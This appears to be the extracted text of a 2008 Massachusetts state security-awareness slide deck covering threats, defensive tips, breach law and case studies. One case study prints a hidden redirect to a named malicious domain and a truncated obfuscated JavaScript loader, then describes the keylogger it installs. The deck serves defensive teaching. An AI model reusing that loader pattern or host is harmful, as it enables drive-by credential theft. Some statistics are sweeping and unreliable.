Title: Cyber Security Awareness Everything You Were Afraid to Know About Computer Security, But Always Want
1Cyber Security AwarenessEverything You Were
Afraid to Know About Computer Security, But
Always Wanted to Ask
- Commonwealth of Mass.
- Information Technology Division
- November, 2008
2Objectives for Today
- Understand network security threats
- Learn simple defensive measures
- Review some recent breaches
- Introduce applicable new legislation
3The Sermon
- Sobering Statistics
- Why do we need to be here today?
- The Threats
- How Things Go Wrong
- Protecting Yourself
- Have I Been Compromised?
- A Few High-Profile Case Studies
- A Recent Eye-Opening Incident
- Security Resources and References
- Q A
4Statistics
- One new infected web page is discovered every 5
seconds - One in 500 e-mail messages contains confidential
information - One in 2500 e-mail messages contains an infected
attachment - 41 of people use the same password at every site
they visit - In 2007, 37000 reported breaches of government
and private systems occurred - Revenues from cybercrime now exceed drug
trafficking as the most lucrative illegal global
business, estimated at more than 1 trillion
annually in illegal profits - 75 percent of companies surveyed in 2004 reported
a data-security breach within the past 12 months.
(The Ponemon Institute) - 70 of security incidents are inside jobs.
(Gartner Group) - Many government offices dont even know yet that
they are leaking information. 90 of cases are
probably still not known. McAfee Criminology
Report
5Why are we here today?
- The World has Changed!
- Flying?
- Technology Advancements
- Moores Law 50 years of supporting data
- Processor Speed
- Memory (Smaller, Faster, Larger Capacity)
- Hard Drives (Smaller, with Larger Capacity)
- Price (Bang per Buck)
- What was Impossible 10 Years Ago is Routine
Today. - Searching for a Cure to Web Malware
6Our Mission
- We still need to do our jobs
- Educating Students of the Commonwealth
- Securing Cyber-Resources
- ID Theft Data Breach Legislation
- M.G.L. Ch 93H
- Executive Order 504
- 201 CMR 17.00
7The Challenge
- Walking the tightrope between
- Taking full advantage of the constantly expanding
wealth of IT resources available to us, and - Increased risk of exposure to attacks that
accompanies increased reliance on technology. - Allowing business operations anytime and
anywhere, via an increasing number of different
devices and to an increasing number of mobile
users and customers.
8Threats to Students
- MySpace
- FaceBook
- YouTube
- Peer-to-Peer Networks
- Instant Messaging
- Cyber Predators/Bullies
- Inappropriate/Offensive Web Content
9Threats to Networks
- Two primary categories of threat
- Denial of Service
- Loss/Leakage of Sensitive Data
10Denial of Service (DoS)
- Definition
- Flooding a network with useless traffic, to the
point of slowing or completely interrupting
regular services - Often in combination with groups of other
remotely-controlled computers - a/k/a Bot Nets
- Result Distributed Denial of Service (DDoS)
11Data Loss/Leakage
- Definition
- Accidental leaking of sensitive information
through sent data - Refers to the transmission of data which are
either sensitive or useful in the further
exploitation of the system through standard data
channels - Result ? compromise of data confidentiality
- Since 2005, more than 200 million victims of data
breach have been reported!
12How Things Go Wrong
- Actively
- User does something explicit to enable compromise
- Open an infected email attachment
- Follow a malicious web link
- Accept IM-initiated downloads
- Execute Web 2.0 rogue application
- Passively
- Attacker breaks into the users PC via scans
- Unpatched operating system
- Buggy application software
- Vulnerable open ports
- Compromised legitimate web sites
13How Things Go Wrong (cont.)
- Carelessness
- 98 of breaches are the result of stupidity or
inadvertent user action. (IANS, 2007) - Actions by Malicious Insiders
- 1.5 of breaches
- Efforts by Organized Crime, Industrial Spies, and
Foreign Government Agents - Least Frequent ( 0.5), but Most Costly, Most
Sophisticated, and Most Difficult to Detect and
Defend Against
14Who is Most Vulnerable?
- Those who dont patch regularly and dont keep
A/V up to date - Dial-up Users (but not very appealing to
attackers) - Home Broadband Users
- University Users
- Mobile Users
15Protecting Yourself
- Patch, Patch, Patch!
- Use auto-update whenever possible
- Anti-Virus Software (update daily)
- Anti-SpyWare Software
- Personal Firewall Software
- Set and use good passwords on all accounts
- How Strong is Your Password?
- Encrypt Sensitive Data
- Separate Student and Teacher/Admin Networks
16Protecting Yourself (cont.)
- Wireless Networks Beware!
- Wireless Routers/Access Points
- Change default password and default SSID
- SSID name should be non-trivial
- Disable broadcasting of SSID if possible
- Enable WPA/WPA-2 encryption, and change default
key - Enable and use MAC filtering
- Dont save user IDs and passwords on your hard
drive - Dont Web surf from a privileged account!
- Turn off auto-run for removable media
- Practice Safe Internet
- E-mail attachments
- Downloads from Questionable Sites (esp. Freeware)
- Peer-to-Peer Networks Promiscuous Files Sharing
1710 Tips for Fighting Malware
- Install (and use!) Anti-Virus Software
- Install a Personal Firewall
- Install an Anti-Spyware Tool
- Patch!
- Keep Browser Security Settings at Medium or High
- Just Say No! to Orgs You Dont Know/Trust
- Avoid Browser Search-Help Bars
- Verify Software Certificates Trusted by Your
Browser - Get a Credit Card Only for Internet Shopping
- Dont Run Executable E-mail Attachments (Even
From a Known Source)
18Have I Been Compromised?
- How to tell if youve fallen victim
- Abnormal slowdown in performance
- Mysterious failures in commonly-used apps
- Email
- Web surfing
- Unexpected popups
- Mysterious/Unexpected outbound traffic
- The only sure-fire way to detect a compromise
- Cleaning a Bot
- Painful!
- Requires 8-16 hours of cleanup time
- Best if done by a professional
19Data Breach ID Theft
- M. G. L. c. 93H and 93I
- New law went into effect October 31, 2007
- Civil fine of up to 100 per affected person
- Executive Order 504
- Mandatory information security training
- Effective September 19, 2008
- Training for current staff within 12 months
- 201 CMR 17.00
- Mandates encryption of personal data
- Effective January 1, 2009
20Cyber-Breach Poster Children
- Milton Academy Network Breach (Nov 07)
- Needham PowerSchool Breach (August 08)
- GOP Stolen Laptop Unencrypted (September 08)
- CardSystems Solutions
- TJX Companies, Inc.
- CitiFinancial Services
- Boston College
- Monster.com
- Massachusetts DPL
- Nordea Bank (Sweden)
21In the News
- Commonwealth of PA, 1/4/08
- Network attacked via compromised agency web pages
- SQL injection used to update DB tables with links
to malicious website - Users who visit compromised agencys web site are
silently redirected to a series of malicious web
pages that try to exploit client-side (i.e.,
users) vulnerabilities in a number of
applications - IE, RealPlayer, et al
- Vulnerable systems become infected with malware
- An example of drive-by downloads
22Evolving Threats to Users
- New and sophisticated forms of attack
- Customized viruses, self-modifying threats, and
threats that attack back - Attacks targeting new technologies
- Peer-to-peer and VoIP services
- Attacks targeting online social networks
- MySpace, Facebook, YouTube, etc.
- Attacks targeting online services
- Especially online banking
23New Threat Spamdexing
- Web Searches!
- 20 lead to unwanted content or malware sites
- 80 of search blocks point to offensive content
- Drive-by Downloads
- Compromised, legitimate web site silently
redirects user to malware sites - Mitigation corporate safe web search tool
- Notify web users of potential risks in real time
24Resources References
- US-CERT (United States Computer Emergency
Readiness Team) - http//www.us-cert.gov/
- MS-ISAC (Multi-State Information Sharing and
Access Center) - http//www.msisac.org
- Identity Theft Research Center
- http//www.idtheftcenter.org
25Close to Home a Lesson
- Analysis completed on October 30, 2007
- Involved breach of non-secret military network
- But could happen to anyone
- Attack vector?
- New York City public library!
26NYC Public Library
27NYC Public Library (cont.)
28NYC Public Library (cont.)
29NYC Public Library (cont.)
- Hidden in the bogus NYPL web page is
- Whats that???
30NYC Public Library (cont.)
- Whats really there
- _id1" style"visibility hiddendisplay
none" - This redirects user to http//meraxe.com/fsp1/i
ndex.php - This all happens silently and invisibly!
- Whats at meraxe.com?
31NYC Public Library (cont.)
- At meraxe.com, we find
- function v4726d05808fd9(v4726d058097a8)
function v4726d05809f78 () var
v4726d0580a74816 return v4726d0580a748
return(parseInt(v4726d058097a8,v4726d05809f78()))
function v4726d0580af18(v4726d0580b6e8)
function v4726d0580ce59 () var v4726d0580d6302
return v4726d0580d630 var v4726d0580beb8''for(
v4726d0580c68d0 v4726d0580c68dngth v4726d0580c68dv4726d0580ce59())
v4726d0580beb8(String.fromCharCode(v4726d05808fd
9(v4726d0580b6e8.substr(v4726d0580c68d,
v4726d0580ce59()))))return v4726d0580beb8
document.write(v4726d0580af18('Truncated))t - Effects
- The above code is (silently) downloaded and
executed
32NYC Public Library (cont.)
- What happened???
- Downloaded and executed a file (age.exe)
- Added file c\WINDOWS\system32\control.dll
- Added several Registry entries
- Control.dll is loaded as a Browser Helper Object
(BHO) when IE is started and becomes a keylogger - Deleted itself
- Effects
- Control.dll monitors data entered into forms in
IE - Steals users login credentials for legitimate
web sites - On-line banking, credit cards, eBay, Paypal, etc,
etc - Phones home with stolen data
33Q A
- Summary
- Protecting yourself is only half the battle
- Constant vigilance awareness are a must
- Trust, but verify. Ronald Regan, quoting an
old Russian (!) proverb - Questions?